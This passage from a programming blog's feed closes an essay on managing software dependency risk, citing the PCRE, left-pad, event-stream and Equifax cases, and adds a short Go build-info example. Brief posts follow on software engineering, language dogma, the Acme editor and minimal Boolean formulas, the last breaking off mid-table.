however, we learned that PCRE had a history of problems like buffer overflows, especially in its parser. We could have learned the same by searching for PCRE in the NVD. That discovery didn’t immediately cause us to abandon PCRE, but it did make us think more carefully about testing and isolation. 
<a class=anchor href="#licensing"><h3 id="licensing">Licensing</h3></a> <p> Is the code properly licensed? Does it have a license at all? Is the license acceptable for your project or company? A surprising fraction of projects on GitHub have no clear license. Your project or company may impose further restrictions on the allowed licenses of dependencies. For example, Google disallows the use of code licensed under AGPL-like licenses (too onerous) as well as WTFPL-like licenses (too vague).<a class=footnote id=body13 href="#note13"><sup>13</sup></a> <a class=anchor href="#dependencies"><h3 id="dependencies">Dependencies</h3></a> <p> Does the code have dependencies of its own? Flaws in indirect dependencies are just as bad for your program as flaws in direct dependencies. Dependency managers can list all the transitive dependencies of a given package, and each of them should ideally be inspected as described in this section. A package with many dependencies incurs additional inspection work, because those same dependencies incur additional risk that needs to be evaluated. <p> Many developers have never looked at the full list of transitive dependencies of their code and don’t know what they depend on. For example, in March 2016 the NPM user community discovered that many popular projects—including Babel, Ember, and React—all depended indirectly on a tiny package called <code>left-pad</code>, consisting of a single 8-line function body. They discovered this when the author of <code>left-pad</code> deleted that package from NPM, inadvertently breaking most Node.js users’ builds.<a class=footnote id=body14 href="#note14"><sup>14</sup></a> And <code>left-pad</code> is hardly exceptional in this regard. For example, 30% of the 750,000 packages published on NPM depend—at least indirectly—on <code>escape-string-regexp</code>. Adapting Leslie Lamport’s observation about distributed systems, a dependency manager can easily create a situation in which the failure of a package you didn’t even know existed can render your own code unusable. <a class=anchor href="#test_the_dependency"><h2 id="test_the_dependency">Test the dependency</h2></a> <p> The inspection process should include running a package’s own tests. If the package passes the inspection and you decide to make your project depend on it, the next step should be to write new tests focused on the functionality needed by your application. These tests often start out as short standalone programs written to make sure you can understand the package’s API and that it does what you think it does. (If you can’t or it doesn’t, turn back now!) It is worth then taking the extra effort to turn those programs into automated tests that can be run against newer versions of the package. If you find a bug and have a potential fix, you’ll want to be able to rerun these project-specific tests easily, to make sure that the fix did not break anything else. <p> It is especially worth exercising the likely problem areas identified by the basic inspection. For Code Search, we knew from past experience that PCRE sometimes took a long time to execute certain regular expression searches. Our initial plan was to have separate thread pools for “simple” and “complicated” regular expression searches. One of the first tests we ran was a benchmark, comparing <code>pcregrep</code> with a few other <code>grep</code> implementations. 
When we found that, for one basic test case, <code>pcregrep</code> was 70X slower than the fastest <code>grep</code> available, we started to rethink our plan to use PCRE. Even though we eventually dropped PCRE entirely, that benchmark remains in our code base today. <a class=anchor href="#abstract_the_dependency"><h2 id="abstract_the_dependency">Abstract the dependency</h2></a> <p> Depending on a package is a decision that you are likely to revisit later. Perhaps updates will take the package in a new direction. Perhaps serious security problems will be found. Perhaps a better option will come along. For all these reasons, it is worth the effort to make it easy to migrate your project to a new dependency. <p> If the package will be used from many places in your project’s source code, migrating to a new dependency would require making changes to all those different source locations. Worse, if the package will be exposed in your own project’s API, migrating to a new dependency would require making changes in all the code calling your API, which you might not control. To avoid these costs, it makes sense to define an interface of your own, along with a thin wrapper implementing that interface using the dependency. Note that the wrapper should include only what your project needs from the dependency, not everything the dependency offers. Ideally, that allows you to substitute a different, equally appropriate dependency later, by changing only the wrapper. Migrating your per-project tests to use the new interface tests the interface and wrapper implementation and also makes it easy to test any potential replacements for the dependency. <p> For Code Search, we developed an abstract <code>Regexp</code> class that defined the interface Code Search needed from any regular expression engine. Then we wrote a thin wrapper around PCRE implementing that interface. The indirection made it easy to test alternate libraries, and it kept us from accidentally introducing knowledge of PCRE internals into the rest of the source tree. That in turn ensured that it would be easy to switch to a different dependency if needed. <a class=anchor href="#isolate_the_dependency"><h2 id="isolate_the_dependency">Isolate the dependency</h2></a> <p> It may also be appropriate to isolate a dependency at run-time, to limit the possible damage caused by bugs in it. For example, Google Chrome allows users to add dependencies—extension code—to the browser. When Chrome launched in 2008, it introduced the critical feature (now standard in all browsers) of isolating each extension in a sandbox running in a separate operating-system process.<a class=footnote id=body15 href="#note15"><sup>15</sup></a> An exploitable bug in a badly-written extension therefore did not automatically have access to the entire memory of the browser itself and could be stopped from making inappropriate system calls.<a class=footnote id=body16 href="#note16"><sup>16</sup></a> For Code Search, until we dropped PCRE entirely, our plan was to isolate at least the PCRE parser in a similar sandbox. Today, another option would be a lightweight hypervisor-based sandbox like gVisor.<a class=footnote id=body17 href="#note17"><sup>17</sup></a> Isolating dependencies reduces the associated risks of running that code. <p> Even with these examples and other off-the-shelf options, run-time isolation of suspect code is still too difficult and rarely done. True isolation would require a completely memory-safe language, with no escape hatch into untyped code.
That’s challenging not just in entirely unsafe languages like C and C++ but also in languages that provide restricted unsafe operations, like Java when including JNI, or like Go, Rust, and Swift when including their “unsafe” features. Even in a memory-safe language like JavaScript, code often has access to far more than it needs. In November 2018, the latest version of the NPM package <code>event-stream</code>, which provided a functional streaming API for JavaScript events, was discovered to contain obfuscated malicious code that had been added two and a half months earlier. The code, which harvested large Bitcoin wallets from users of the Copay mobile app, was accessing system resources entirely unrelated to processing event streams.<a class=footnote id=body18 href="#note18"><sup>18</sup></a> One of many possible defenses to this kind of problem would be to better restrict what dependencies can access. <a class=anchor href="#avoid_the_dependency"><h2 id="avoid_the_dependency">Avoid the dependency</h2></a> <p> If a dependency seems too risky and you can’t find a way to isolate it, the best answer may be to avoid it entirely, or at least to avoid the parts you’ve identified as most problematic. <p> For example, as we better understood the risks and costs associated with PCRE, our plan for Google Code Search evolved from “use PCRE directly,” to “use PCRE but sandbox the parser,” to “write a new regular expression parser but keep the PCRE execution engine,” to “write a new parser and connect it to a different, more efficient open-source execution engine.” Later we rewrote the execution engine as well, so that no dependencies were left, and we open-sourced the result: RE2.<a class=footnote id=body19 href="#note19"><sup>19</sup></a> <p> If you only need a tiny fraction of a dependency, it may be simplest to make a copy of what you need (preserving appropriate copyright and other legal notices, of course). You are taking on responsibility for fixing bugs, maintenance, and so on, but you’re also completely isolated from the larger risks. The Go developer community has a proverb about this: “A little copying is better than a little dependency.”<a class=footnote id=body20 href="#note20"><sup>20</sup></a> <a class=anchor href="#upgrade_the_dependency"><h2 id="upgrade_the_dependency">Upgrade the dependency</h2></a> <p> For a long time, the conventional wisdom about software was “if it ain’t broke, don’t fix it.” Upgrading carries a chance of introducing new bugs; without a corresponding reward—like a new feature you need—why take the risk? This analysis ignores two costs. The first is the cost of the eventual upgrade. In software, the difficulty of making code changes does not scale linearly: making ten small changes is less work and easier to get right than making one equivalent large change. The second is the cost of discovering already-fixed bugs the hard way. Especially in a security context, where known bugs are actively exploited, every day you wait is another day that attackers can break in. <p> For example, consider the year 2017 at Equifax, as recounted by executives in detailed congressional testimony.<a class=footnote id=body21 href="#note21"><sup>21</sup></a> On March 7, a new vulnerability in Apache Struts was disclosed, and a patched version was released. On March 8, Equifax received a notice from US-CERT about the need to update any uses of Apache Struts. 
Equifax ran source code and network scans on March 9 and March 15, respectively; neither scan turned up a particular group of public-facing web servers. On May 13, attackers found the servers that Equifax’s security teams could not. They used the Apache Struts vulnerability to breach Equifax’s network and then steal detailed personal and financial information about 148 million people over the next two months. Equifax finally noticed the breach on July 29 and publicly disclosed it on September 4. By the end of September, Equifax’s CEO, CIO, and CSO had all resigned, and a congressional investigation was underway. <p> Equifax’s experience drives home the point that although dependency managers know the versions they are using at build time, you need other arrangements to track that information through your production deployment process. For the Go language, we are experimenting with automatically including a version manifest in every binary, so that deployment processes can scan binaries for dependencies that need upgrading. Go also makes that information available at run-time, so that servers can consult databases of known bugs and self-report to monitoring software when they are in need of upgrades. <p> Upgrading promptly is important, but upgrading means adding new code to your project, which should mean updating your evaluation of the risks of using the dependency based on the new version. At a minimum, you’d want to skim the diffs showing the changes being made from the current version to the upgraded versions, or at least read the release notes, to identify the most likely areas of concern in the upgraded code. If a lot of code is changing, so that the diffs are difficult to digest, that is also information you can incorporate into your risk assessment update. <p> You’ll also want to re-run the tests you’ve written that are specific to your project, to make sure the upgraded package is at least as suitable for the project as the earlier version. It also makes sense to re-run the package’s own tests. If the package has its own dependencies, it is entirely possible that your project’s configuration uses different versions of those dependencies (either older or newer ones) than the package’s authors use. Running the package’s own tests can quickly identify problems specific to your configuration. <p> Again, upgrades should not be completely automatic. You need to verify that the upgraded versions are appropriate for your environment before deploying them.<a class=footnote id=body22 href="#note22"><sup>22</sup></a> <p> If your upgrade process includes re-running the integration and qualification tests you’ve already written for the dependency, so that you are likely to identify new problems before they reach production, then, in most cases, delaying an upgrade is riskier than upgrading quickly. <p> The window for security-critical upgrades is especially short. In the aftermath of the Equifax breach, forensic security teams found evidence that attackers (perhaps different ones) had successfully exploited the Apache Struts vulnerability on the affected servers on March 10, only three days after it was publicly disclosed, but they’d only run a single <code>whoami</code> command. <a class=anchor href="#watch_your_dependencies"><h2 id="watch_your_dependencies">Watch your dependencies</h2></a> <p> Even after all that work, you’re not done tending your dependencies. It’s important to continue to monitor them and perhaps even re-evaluate your decision to use them.
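<p> As an aside, the run-time version manifest mentioned above has a concrete form in recent Go releases: a binary built with module support can report its own dependency versions through <code>runtime/debug.ReadBuildInfo</code>. The program below is a minimal sketch of that kind of self-reporting, an illustration rather than a prescription: <pre>package main

import (
	"fmt"
	"runtime/debug"
)

func main() {
	// Read the module information embedded in this binary at build time.
	info, ok := debug.ReadBuildInfo()
	if !ok {
		fmt.Println("no module information in this binary")
		return
	}
	fmt.Println("main module:", info.Main.Path, info.Main.Version)
	// Each dependency carries its module path, version, and source hash,
	// which a server could report to monitoring software.
	for _, dep := range info.Deps {
		fmt.Println("dependency:", dep.Path, dep.Version, dep.Sum)
	}
}
</pre> <p> External tooling can read the same manifest out of a binary without running it, which is what makes it possible to scan a production fleet for dependencies in need of upgrading.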
<p> First, make sure that you keep using the specific package versions you think you are. Most dependency managers now make it easy or even automatic to record the cryptographic hash of the expected source code for a given package version and then to check that hash when re-downloading the package on another computer or in a test environment. This ensures that your build uses the same dependency source code you inspected and tested. These kinds of checks prevented the <code>event-stream</code> attacker, described earlier, from silently inserting malicious code in the already-released version 3.3.5. Instead, the attacker had to create a new version, 3.3.6, and wait for people to upgrade (without looking closely at the changes). <p> It is also important to watch for new indirect dependencies creeping in: upgrades can easily introduce new packages upon which the success of your project now depends. They deserve your attention as well. In the case of <code>event-stream</code>, the malicious code was hidden in a different package, <code>flatmap-stream</code>, which the new <code>event-stream</code> release added as a new dependency. <p> Creeping dependencies can also affect the size of your project. During the development of Google’s Sawzall<a class=footnote id=body23 href="#note23"><sup>23</sup></a>—a JIT’ed logs processing language—the authors discovered at various times that the main interpreter binary contained not just Sawzall’s JIT but also (unused) PostScript, Python, and JavaScript interpreters. Each time, the culprit turned out to be unused dependencies declared by some library Sawzall did depend on, combined with the fact that Google’s build system eliminated any manual effort needed to start using a new dependency. This kind of error is the reason that the Go language makes importing an unused package a compile-time error. <p> Upgrading is a natural time to revisit the decision to use a dependency that’s changing. It’s also important to periodically revisit any dependency that <i>isn’t</i> changing. Does it seem plausible that there are no security problems or other bugs to fix? Has the project been abandoned? Maybe it’s time to start planning to replace that dependency. <p> It’s also important to recheck the security history of each dependency. For example, Apache Struts disclosed different major remote code execution vulnerabilities in 2016, 2017, and 2018. Even if you have a list of all the servers that run it and update them promptly, that track record might make you rethink using it at all. <a class=anchor href="#conclusion"><h2 id="conclusion">Conclusion</h2></a> <p> Software reuse is finally here, and I don’t mean to understate its benefits: it has brought an enormously positive transformation for software developers. Even so, we’ve accepted this transformation without completely thinking through the potential consequences. The old reasons for trusting dependencies are becoming less valid at exactly the same time we have more dependencies than ever. <p> The kind of critical examination of specific dependencies that I outlined in this article is a significant amount of work and remains the exception rather than the rule. But I doubt there are any developers who actually make the effort to do this for every possible new dependency. I have only done a subset of them for a subset of my own dependencies. Most of the time the entirety of the decision is “let’s see what happens.” Too often, anything more than that seems like too much effort.
<p> But the Copay and Equifax attacks are clear warnings of real problems in the way we consume software dependencies today. We should not ignore the warnings. I offer three broad recommendations. <ol> <li> <p> <i>Recognize the problem.</i> If nothing else, I hope this article has convinced you that there is a problem here worth addressing. We need many people to focus significant effort on solving it. <li> <p> <i>Establish best practices for today.</i> We need to establish best practices for managing dependencies using what’s available today. This means working out processes that evaluate, reduce, and track risk, from the original adoption decision through to production use. In fact, just as some engineers specialize in testing, it may be that we need engineers who specialize in managing dependencies. <li> <p> <i>Develop better dependency technology for tomorrow.</i> Dependency managers have essentially eliminated the cost of downloading and installing a dependency. Future development effort should focus on reducing the cost of the kind of evaluation and maintenance necessary to use a dependency. For example, package discovery sites might work to find more ways to allow developers to share their findings. Build tools should, at the least, make it easy to run a package’s own tests. More aggressively, build tools and package management systems could also work together to allow package authors to test new changes against all public clients of their APIs. Languages should also provide easy ways to isolate a suspect package.</ol> <p> There’s a lot of good software out there. Let’s work together to find out how to reuse it safely. <p> <a class=anchor href="#references"><h2 id="references">References</h2></a> <ol> <li><a name=note1></a> Rachel Potvin and Josh Levenberg, “Why Google Stores Billions of Lines of Code in a Single Repository,” <i>Communications of the ACM</i> 59(7) (July 2016), pp. 78-87. <a href="https://doi.org/10.1145/2854146">https://doi.org/10.1145/2854146</a> <a class=back href="#body1">(⇡)</a> <li><a name=note2></a> Russ Cox, “Go &amp; Versioning,” February 2018. <a href="https://research.swtch.com/vgo">https://research.swtch.com/vgo</a> <a class=back href="#body2">(⇡)</a> <li><a name=note3></a> Ken Thompson, “Reflections on Trusting Trust,” <i>Communications of the ACM</i> 27(8) (August 1984), pp. 761–763. <a href="https://doi.org/10.1145/358198.358210">https://doi.org/10.1145/358198.358210</a> <a class=back href="#body3">(⇡)</a> <li><a name=note4></a> GNU Project, “GNU General Public License, version 1,” February 1989. <a href="https://www.gnu.org/licenses/old-licenses/gpl-1.0.html">https://www.gnu.org/licenses/old-licenses/gpl-1.0.html</a> <a class=back href="#body4">(⇡)</a> <li><a name=note5></a> Titus Winters, “SD-8: Standard Library Compatibility,” C++ Standing Document, August 2018. <a href="https://isocpp.org/std/standing-documents/sd-8-standard-library-compatibility">https://isocpp.org/std/standing-documents/sd-8-standard-library-compatibility</a> <a class=back href="#body5">(⇡)</a> <li><a name=note6></a> Go Project, “Go 1 and the Future of Go Programs,” September 2013. 
<a href="https://golang.org/doc/go1compat">https://golang.org/doc/go1compat</a> <a class=back href="#body6">(⇡)</a> <li><a name=note7></a> Facebook, “Infer: A tool to detect bugs in Java and C/C++/Objective-C code before it ships.” <a href="https://fbinfer.com/">https://fbinfer.com/</a> <a class=back href="#body7">(⇡)</a> <li><a name=note8></a> “SpotBugs: Find bugs in Java Programs.” <a href="https://spotbugs.github.io/">https://spotbugs.github.io/</a> <a class=back href="#body8">(⇡)</a> <li><a name=note9></a> D. Richard Hipp, “How SQLite is Tested.” <a href="https://www.sqlite.org/testing.html">https://www.sqlite.org/testing.html</a> <a class=back href="#body9">(⇡)</a> <li><a name=note10></a> Alexander Potapenko, “Testing Chromium: ThreadSanitizer v2, a next-gen data race detector,” April 2014. <a href="https://blog.chromium.org/2014/04/testing-chromium-threadsanitizer-v2.html">https://blog.chromium.org/2014/04/testing-chromium-threadsanitizer-v2.html</a> <a class=back href="#body10">(⇡)</a> <li><a name=note11></a> NIST, “National Vulnerability Database – Search and Statistics.” <a href="https://nvd.nist.gov/vuln/search">https://nvd.nist.gov/vuln/search</a> <a class=back href="#body11">(⇡)</a> <li><a name=note12></a> Russ Cox, “Regular Expression Matching with a Trigram Index, or How Google Code Search Worked,” January 2012. <a href="https://swtch.com/~rsc/regexp/regexp4.html">https://swtch.com/~rsc/regexp/regexp4.html</a> <a class=back href="#body12">(⇡)</a> <li><a name=note13></a> Google, “Google Open Source: Using Third-Party Licenses.” <a href="https://opensource.google.com/docs/thirdparty/licenses/#banned">https://opensource.google.com/docs/thirdparty/licenses/#banned</a> <a class=back href="#body13">(⇡)</a> <li><a name=note14></a> Nathan Willis, “A single Node of failure,” LWN, March 2016. <a href="https://lwn.net/Articles/681410/">https://lwn.net/Articles/681410/</a> <a class=back href="#body14">(⇡)</a> <li><a name=note15></a> Charlie Reis, “Multi-process Architecture,” September 2008. <a href="https://blog.chromium.org/2008/09/multi-process-architecture.html">https://blog.chromium.org/2008/09/multi-process-architecture.html</a> <a class=back href="#body15">(⇡)</a> <li><a name=note16></a> Adam Langley, “Chromium’s seccomp Sandbox,” August 2009. <a href="https://www.imperialviolet.org/2009/08/26/seccomp.html">https://www.imperialviolet.org/2009/08/26/seccomp.html</a> <a class=back href="#body16">(⇡)</a> <li><a name=note17></a> Nicolas Lacasse, “Open-sourcing gVisor, a sandboxed container runtime,” May 2018. <a href="https://cloud.google.com/blog/products/gcp/open-sourcing-gvisor-a-sandboxed-container-runtime">https://cloud.google.com/blog/products/gcp/open-sourcing-gvisor-a-sandboxed-container-runtime</a> <a class=back href="#body17">(⇡)</a> <li><a name=note18></a> Adam Baldwin, “Details about the event-stream incident,” November 2018. <a href="https://blog.npmjs.org/post/180565383195/details-about-the-event-stream-incident">https://blog.npmjs.org/post/180565383195/details-about-the-event-stream-incident</a> <a class=back href="#body18">(⇡)</a> <li><a name=note19></a> Russ Cox, “RE2: a principled approach to regular expression matching,” March 2010. <a href="https://opensource.googleblog.com/2010/03/re2-principled-approach-to-regular.html">https://opensource.googleblog.com/2010/03/re2-principled-approach-to-regular.html</a> <a class=back href="#body19">(⇡)</a> <li><a name=note20></a> Rob Pike, “Go Proverbs,” November 2015. 
<a href="https://go-proverbs.github.io/">https://go-proverbs.github.io/</a> <a class=back href="#body20">(⇡)</a> <li><a name=note21></a> U.S. House of Representatives Committee on Oversight and Government Reform, “The Equifax Data Breach,” Majority Staff Report, 115th Congress, December 2018. <a href="https://republicans-oversight.house.gov/wp-content/uploads/2018/12/Equifax-Report.pdf">https://republicans-oversight.house.gov/wp-content/uploads/2018/12/Equifax-Report.pdf</a> <a class=back href="#body21">(⇡)</a> <li><a name=note22></a> Russ Cox, “The Principles of Versioning in Go,” GopherCon Singapore, May 2018. <a href="https://www.youtube.com/watch?v=F8nrpe0XWRg">https://www.youtube.com/watch?v=F8nrpe0XWRg</a> <a class=back href="#body22">(⇡)</a> <li><a name=note23></a> Rob Pike, Sean Dorward, Robert Griesemer, and Sean Quinlan, “Interpreting the Data: Parallel Analysis with Sawzall,” <i>Scientific Programming Journal</i>, vol. 13 (2005). <a href="https://doi.org/10.1155/2005/962135">https://doi.org/10.1155/2005/962135</a> <a class=back href="#body23">(⇡)</a> </ol> <a class=anchor href="#coda"><h2 id="coda">Coda</h2></a> <p> A version of this post was published in <a href="https://queue.acm.org/detail.cfm?id=3344149">ACM Queue</a> (March-April 2019) and then <a href="https://dl.acm.org/doi/pdf/10.1145/3347446">Communications of the ACM</a> (August 2019) under the title “Surviving Software Dependencies.” What is Software Engineering? tag:research.swtch.com,2012:research.swtch.com/vgo-eng 2018-05-30T10:00:00-04:00 2018-05-30T10:02:00-04:00 What is software engineering and what does Go mean by it? (Go & Versioning, Part 9) <p> Nearly all of Go’s distinctive design decisions were aimed at making software engineering simpler and easier. We’ve said this often. The canonical reference is Rob Pike’s 2012 article, “<a href="https://talks.golang.org/2012/splash.article">Go at Google: Language Design in the Service of Software Engineering</a>.” But what is software engineering?<blockquote> <p> <i>Software engineering is what happens to programming <br> when you add time and other programmers.</i></blockquote> <p> Programming means getting a program working. You have a problem to solve, you write some Go code, you run it, you get your answer, you’re done. That’s programming, and that’s difficult enough by itself. But what if that code has to keep working, day after day? What if five other programmers need to work on the code too? Then you start to think about version control systems, to track how the code changes over time and to coordinate with the other programmers. You add unit tests, to make sure bugs you fix are not reintroduced over time, not by you six months from now, and not by that new team member who’s unfamiliar with the code. You think about modularity and design patterns, to divide the program into parts that team members can work on mostly independently. You use tools to help you find bugs earlier. You look for ways to make programs as clear as possible, so that bugs are less likely. You make sure that small changes can be tested quickly, even in large programs. You’re doing all of this because your programming has turned into software engineering. 
<p> (This definition and explanation of software engineering is my riff on an original theme by my Google colleague Titus Winters, whose preferred phrasing is “software engineering is programming integrated over time.” It’s worth seven minutes of your time to see <a href="https://www.youtube.com/watch?v=tISy7EJQPzI&t=8m17s">his presentation of this idea at CppCon 2017</a>, from 8:17 to 15:00 in the video.) <p> As I said earlier, nearly all of Go’s distinctive design decisions have been motivated by concerns about software engineering, by trying to accommodate time and other programmers into the daily practice of programming. <p> For example, most people think that we format Go code with <code>gofmt</code> to make code look nicer or to end debates among team members about program layout. But the <a href="https://groups.google.com/forum/#!msg/golang-nuts/HC2sDhrZW5Y/7iuKxdbLExkJ">most important reason for <code>gofmt</code></a> is that if an algorithm defines how Go source code is formatted, then programs, like <code>goimports</code> or <code>gorename</code> or <code>go</code> <code>fix</code>, can edit the source code more easily, without introducing spurious formatting changes when writing the code back. This helps you maintain code over time. <p> As another example, Go import paths are URLs. If code said <code>import</code> <code>"uuid"</code>, you’d have to ask which <code>uuid</code> package. Searching for <code>uuid</code> on <a href="https://godoc.org">godoc.org</a> turns up dozens of packages. If instead the code says <code>import</code> <code>"github.com/pborman/uuid"</code>, now it’s clear which package we mean. Using URLs avoids ambiguity and also reuses an existing mechanism for giving out names, making it simpler and easier to coordinate with other programmers. <p> Continuing the example, Go import paths are written in Go source files, not in a separate build configuration file. This makes Go source files self-contained, which makes it easier to understand, modify, and copy them. These decisions, and more, were all made with the goal of simplifying software engineering. <p> In later posts I will talk specifically about why versions are important for software engineering and how software engineering concerns motivate the design changes from dep to vgo. Go and Dogma tag:research.swtch.com,2012:research.swtch.com/dogma 2017-01-09T09:00:00-05:00 2017-01-09T09:02:00-05:00 Programming language dogmatics. <p> [<i>Cross-posting from last year’s <a href="https://www.reddit.com/r/golang/comments/46bd5h/ama_we_are_the_go_contributors_ask_us_anything/d05yyde/?context=3&st=ixq5hjko&sh=7affd469">Go contributors AMA</a> on Reddit, because it’s still important to remember.</i>] <p> One of the perks of working on Go these past years has been the chance to have many great discussions with other language designers and implementers, for example about how well various design decisions worked out or the common problems of implementing what look like very different languages (for example both Go and Haskell need some kind of “green threads”, so there are more shared runtime challenges than you might expect). In one such conversation, when I was talking to a group of early Lisp hackers, one of them pointed out that these discussions are basically never dogmatic. Designers and implementers remember working through the good arguments on both sides of a particular decision, and they’re often eager to hear about someone else’s experience with what happens when you make that decision differently. 
Contrast that kind of discussion with the heated arguments or overly zealous statements you sometimes see from users of the same languages. There’s a real disconnect, possibly because the users don’t have the experience of weighing the arguments on both sides and don’t realize how easily a particular decision might have gone the other way. <p> Language design and implementation is engineering. We make decisions using evaluations of costs and benefits or, if we must, using predictions of those based on past experience. I think we have an important responsibility to explain both sides of a particular decision, to make clear that the arguments for an alternate decision are actually good ones that we weighed and balanced, and to avoid the suggestion that particular design decisions approach dogma. I hope <a href="https://www.reddit.com/r/golang/comments/46bd5h/ama_we_are_the_go_contributors_ask_us_anything/d05yyde/?context=3&st=ixq5hjko&sh=7affd469">the Reddit AMA</a> as well as discussion on <a href="https://groups.google.com/group/golang-nuts">golang-nuts</a> or <a href="http://stackoverflow.com/questions/tagged/go">StackOverflow</a> or the <a href="https://forum.golangbridge.org/">Go Forum</a> or at <a href="https://golang.org/wiki/Conferences">conferences</a> help with that. <p> But we need help from everyone. Remember that none of the decisions in Go are infallible; they’re just our best attempts at the time we made them, not wisdom received on stone tablets. If someone asks why Go does X instead of Y, please try to present the engineering reasons fairly, including for Y, and avoid argument solely by appeal to authority. It’s too easy to fall into the “well that’s just not how it’s done here” trap. And now that I know about and watch for that trap, I see it in nearly every technical community, although some more than others. A Tour of Acme tag:research.swtch.com,2012:research.swtch.com/acme 2012-09-17T11:00:00-04:00 2012-09-17T11:00:00-04:00 A video introduction to Acme, the Plan 9 text editor <p class="lp"> People I work with recognize my computer easily: it's the one with nothing but yellow windows and blue bars on the screen. That's the text editor acme, written by Rob Pike for Plan 9 in the early 1990s. Acme focuses entirely on the idea of text as user interface. It's difficult to explain acme without seeing it, though, so I've put together a screencast explaining the basics of acme and showing a brief programming session. Remember as you watch the video that the 854x480 screen is quite cramped. Usually you'd run acme on a larger screen: even my MacBook Air has almost four times as much screen real estate. </p> <center> <div style="border: 1px solid black; width: 853px; height: 480px;"><iframe width="853" height="480" src="https://www.youtube.com/embed/dP1xVpMPn8M?rel=0" frameborder="0" allowfullscreen></iframe></div> </center> <p class=pp> The video doesn't show everything acme can do, nor does it show all the ways you can use it. Even small idioms like where you type text to be loaded or executed vary from user to user. To learn more about acme, read Rob Pike's paper &ldquo;<a href="/acme.pdf">Acme: A User Interface for Programmers</a>&rdquo; and then try it. </p> <p class=pp> Acme runs on most operating systems. If you use <a href="https://9p.io/">Plan 9 from Bell Labs</a>, you already have it. If you use FreeBSD, Linux, OS X, or most other Unix clones, you can get it as part of <a href="http://swtch.com/plan9port/">Plan 9 from User Space</a>. 
If you use Windows, I suggest trying acme as packaged in <a href="http://code.google.com/p/acme-sac/">acme stand alone complex</a>, which is based on the Inferno programming environment. </p> <p class=lp><b>Mini-FAQ</b>: <ul> <li><i>Q. Can I use scalable fonts?</i> A. On the Mac, yes. If you run <code>acme -f /mnt/font/Monaco/16a/font</code> you get 16-point anti-aliased Monaco as your font, served via <a href="http://swtch.com/plan9port/man/man4/fontsrv.html">fontsrv</a>. If you'd like to add X11 support to fontsrv, I'd be happy to apply the patch. <li><i>Q. Do I need X11 to build on the Mac?</i> A. No. The build will complain that it cannot build &lsquo;snarfer&rsquo; but it should complete otherwise. You probably don't need snarfer. </ul> <p class=pp> If you're interested in history, the predecessor to acme was called help. Rob Pike's paper &ldquo;<a href="/help.pdf">A Minimalist Global User Interface</a>&rdquo; describes it. See also &ldquo;<a href="/sam.pdf">The Text Editor sam</a>&rdquo; </p> <p class=pp> <i>Correction</i>: the smiley program in the video was written by Ken Thompson. I got it from Dennis Ritchie, the more meticulous archivist of the pair. </p> Minimal Boolean Formulas tag:research.swtch.com,2012:research.swtch.com/boolean 2011-05-18T00:00:00-04:00 2011-05-18T00:00:00-04:00 Simplify equations with God <p><style type="text/css"> p { line-height: 150%; } blockquote { text-align: left; } pre.alg { font-family: sans-serif; font-size: 100%; margin-left: 60px; } td, th { padding-left; 5px; padding-right: 5px; vertical-align: top; } #times td { text-align: right; } table { padding-top: 1em; padding-bottom: 1em; } #find td { text-align: center; } </style> <p class=lp> <a href="http://oeis.org/A056287">28</a>. That's the minimum number of AND or OR operators you need in order to write any Boolean function of five variables. <a href="http://alexhealy.net/">Alex Healy</a> and I computed that in April 2010. Until then, I believe no one had ever known that little fact. This post describes how we computed it and how we almost got scooped by <a href="http://research.swtch.com/2011/01/knuth-volume-4a.html">Knuth's Volume 4A</a> which considers the problem for AND, OR, and XOR. </p> <h3>A Naive Brute Force Approach</h3> <p class=pp> Any Boolean function of two variables can be written with at most 3 AND or OR operators: the parity function on two variables X XOR Y is (X AND Y') OR (X' AND Y), where X' denotes &ldquo;not X.&rdquo; We can shorten the notation by writing AND and OR like multiplication and addition: X XOR Y = X*Y' + X'*Y. </p> <p class=pp> For three variables, parity is also a hardest function, requiring 9 operators: X XOR Y XOR Z = (X*Z'+X'*Z+Y')*(X*Z+X'*Z'+Y). </p> <p class=pp> For four variables, parity is still a hardest function, requiring 15 operators: W XOR X XOR Y XOR Z = (X*Z'+X'*Z+W'*Y+W*Y')*(X*Z+X'*Z'+W*Y+W'*Y'). </p> <p class=pp> The sequence so far prompts a few questions. Is parity always a hardest function? Does the minimum number of operators alternate between 2<sup>n</sup>&#8722;1 and 2<sup>n</sup>+1? </p> <p class=pp> I computed these results in January 2001 after hearing the problem from Neil Sloane, who suggested it as a variant of a similar problem first studied by Claude Shannon. </p> <p class=pp> The program I wrote to compute a(4) computes the minimum number of operators for every Boolean function of n variables in order to find the largest minimum over all functions. 
There are 2<sup>4</sup> = 16 settings of four variables, and each function can pick its own value for each setting, so there are 2<sup>16</sup> different functions. To make matters worse, you build new functions by taking pairs of old functions and joining them with AND or OR. 2<sup>16</sup> different functions means 2<sup>16</sup>&#183;2<sup>16</sup> = 2<sup>32</sup> pairs of functions. </p> <p class=pp> The program I wrote was a mangling of the Floyd-Warshall all-pairs shortest paths algorithm. That algorithm is: </p> <pre class="indent alg"> // Floyd-Warshall all pairs shortest path func compute(): for each node i for each node j dist[i][j] = direct distance, or &#8734; for each node k for each node i for each node j d = dist[i][k] + dist[k][j] if d &lt; dist[i][j] dist[i][j] = d return </pre> <p class=lp> The algorithm begins with the distance table dist[i][j] set to an actual distance if i is connected to j and infinity otherwise. Then each round updates the table to account for paths going through the node k: if it's shorter to go from i to k to j, it saves that shorter distance in the table. The nodes are numbered from 0 to n, so the variables i, j, k are simply integers. Because there are only n nodes, we know we'll be done after the outer loop finishes. </p> <p class=pp> The program I wrote to find minimum Boolean formula sizes is an adaptation, substituting formula sizes for distance. </p> <pre class="indent alg"> // Algorithm 1 func compute() for each function f size[f] = &#8734; for each single variable function f = v size[f] = 0 loop changed = false for each function f for each function g d = size[f] + 1 + size[g] if d &lt; size[f OR g] size[f OR g] = d changed = true if d &lt; size[f AND g] size[f AND g] = d changed = true if not changed return </pre> <p class=lp> Algorithm 1 runs the same kind of iterative update loop as the Floyd-Warshall algorithm, but it isn't as obvious when you can stop, because you don't know the maximum formula size beforehand. So it runs until a round doesn't find any new functions to make, iterating until it finds a fixed point. </p> <p class=pp> The pseudocode above glosses over some details, such as the fact that the per-function loops can iterate over a queue of functions known to have finite size, so that each loop omits the functions that aren't yet known. That's only a constant factor improvement, but it's a useful one. </p> <p class=pp> Another important detail missing above is the representation of functions. The most convenient representation is a binary truth table. For example, if we are computing the complexity of two-variable functions, there are four possible inputs, which we can number as follows. </p> <center> <table> <tr><th>X <th>Y <th>Value <tr><td>false <td>false <td>00<sub>2</sub> = 0 <tr><td>false <td>true <td>01<sub>2</sub> = 1 <tr><td>true <td>false <td>10<sub>2</sub> = 2 